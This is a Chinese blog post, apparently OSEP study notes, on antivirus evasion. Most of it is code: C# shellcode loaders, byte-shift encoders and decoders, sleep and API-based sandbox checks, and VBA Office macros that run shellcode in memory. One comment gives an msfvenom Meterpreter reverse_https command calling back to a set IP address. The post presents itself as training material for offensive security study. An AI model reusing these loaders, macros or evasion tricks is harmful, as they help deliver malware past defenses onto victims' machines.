关于笔记形式和学习方法请看OSEP学习之路 | 开篇
本篇是第二部分“免杀基础”技术的上部,笔记基本是按照教材梳理的,章节不是一一对应,因为有些内容合并后更好理解
2-免杀技术
本部分主要包括:
1-手工免杀的基础方法和思路,这些方法与前文介绍的攻击方式的结合;
2-针对macro的专属混淆方式
3-进程注入以及进程镂空(Process Hollowing)
2.1-免杀概述
Find-AVSignature.ps1可以帮助分解文件,确定是哪一部分触发了杀软
https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1与defender结合的便携工具
https://github.com/matterpreter/DefenderCheck使用方法(需要梯子):
https://www.youtube.com/watch?v=9pwMCHlNma42.2-Bypass技术
从一个基础的shellcode loader开始修改进行Bypass测试
using System;using System.Diagnostics;using System.Runtime.InteropServices;using System.Net;using System.Text;using System.Threading;namespace MessingBehaviour{class Program{[]static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[]static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[]static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);static void Main(String[] args){byte[] buf = new byte[732] {...};int size = buf.Length;IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);Marshal.Copy(buf, 0, addr, size);IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);WaitForSingleObject(hThread, 0xffffffff);}}}
2.2.1-加密(Encryption)
shellcode加密程序代码
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;namespace Helper{internal class Program{static void Main(string[] args){byte[] buf = new byte[926] { ... };byte[] encoded = new byte[buf.Length];for (int i = 0; i < buf.Length; i++){encoded[i] = (byte)(((uint)buf[i] + 2) & 0xff);}StringBuilder hex = new StringBuilder(encoded.Length * 2);foreach (byte b in encoded){hex.AppendFormat("0x{0:x2}, ", b);}Console.WriteLine("The payload is: " + hex.ToString());}}}
在shellcode加载程序中解密
using System;using System.Diagnostics;using System.Runtime.InteropServices;using System.Net;using System.Text;using System.Threading;namespace MessingBehaviour{class Program{[]static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[]static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[]static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);static void Main(String[] args){// msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 exitfunc=thread -f csharpbyte[] buf = new byte[700] {... };int size = buf.Length;for(int i = 0; i < size; i++){buf[i] = (byte)(((uint)buf[i] - 2) & 0xff);}IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);Marshal.Copy(buf, 0, addr, size);IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);WaitForSingleObject(hThread, 0xffffffff);}}}
2.2.2-使用Sleep延迟运行
[]static extern void Sleep(uint dwMilliseconds);DateTime t1 = DateTime.Now;Sleep(2000);double t2 = DateTime.Now.Subtract(t1).TotalSeconds;if (t2 < 1.5) {return;}
2.2.3-替换APIs
使用沙箱以外的API进行测试
// VirtualAllocExNumaIntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);if(mem == null) {return;}
使用FlsAlloc测试
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Runtime.InteropServices;using System.Net;namespace EvasionPractice{class Program{[]static extern UInt32 FlsAlloc(IntPtr lpCallback);static void Main(string[] args){UInt32 result = FlsAlloc(IntPtr.Zero);if (result != 0xFFFFFFFF){runner();}return;}static void runner(){Console.WriteLine("Hello World!");}}}
2.3-Office宏Bypass技术
2.3.1-macro加载shellcode
从一个最基础的reverse shell进行修改
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtrPrivate Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtrPrivate Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtrSub myMacro()Dim buf As VariantDim addr As LongPtrDim data As Longbuf = Array(...)addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)For counter = LBound(buf) To UBound(buf)data = buf(counter)res = RtlMoveMemory(addr + counter, data, 1)Next counterres = CreateThread(0, 0, addr, 0, 0, 0)End Sub
方法一:加密(Encryption)
凯撒加密shellcode
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;namespace caesarhelper{internal class Program{static void Main(string[] args){byte[] buf = new byte[670] { ... };byte[] encoded = new byte[670];//0xff + 5for(int i = 0; i < buf.Length; i++){encoded[i] = (byte)(((uint)buf[i]+5) & 0xff);}uint counter = 0;StringBuilder sb = new StringBuilder(encoded.Length*2);foreach(byte b in encoded){sb.AppendFormat("{0:D}, ",b);counter++;if(counter % 50 ==0){sb.AppendFormat("_{0}", Environment.NewLine);}}Console.WriteLine(sb.ToString());}}}
在宏里面解密
Function mymacro()Dim buf As VariantDim addr As LongPtrDim counter As LongDim data As LongDim res As Longbuf = Array(...)For i = 0 To UBound(buf)= buf(i) - 5Next iaddr = VirtualAlloc(0, UBound(buf), &H3000, &H40)For counter = LBound(buf) To UBound(buf)data = buf(counter)res = RtlMoveMemory(addr + counter, data, 1)Next counterres = CreateThread(0, 0, addr, 0, 0, 0)End Function
方法二:通过sleep延迟运行
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As LongFunction sleep_test()Dim t1 As DateDim t2 As DateDim time As Longt1 = Now()Sleep (2000)t2 = Now()time = DateDiff("s", t1, t2)If time < 2 ThenExit FunctionEnd IfEnd Function
坚持自律做最好的自己
原文始发于微信公众号(高级红队专家):OSEP | 免杀基础-上
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论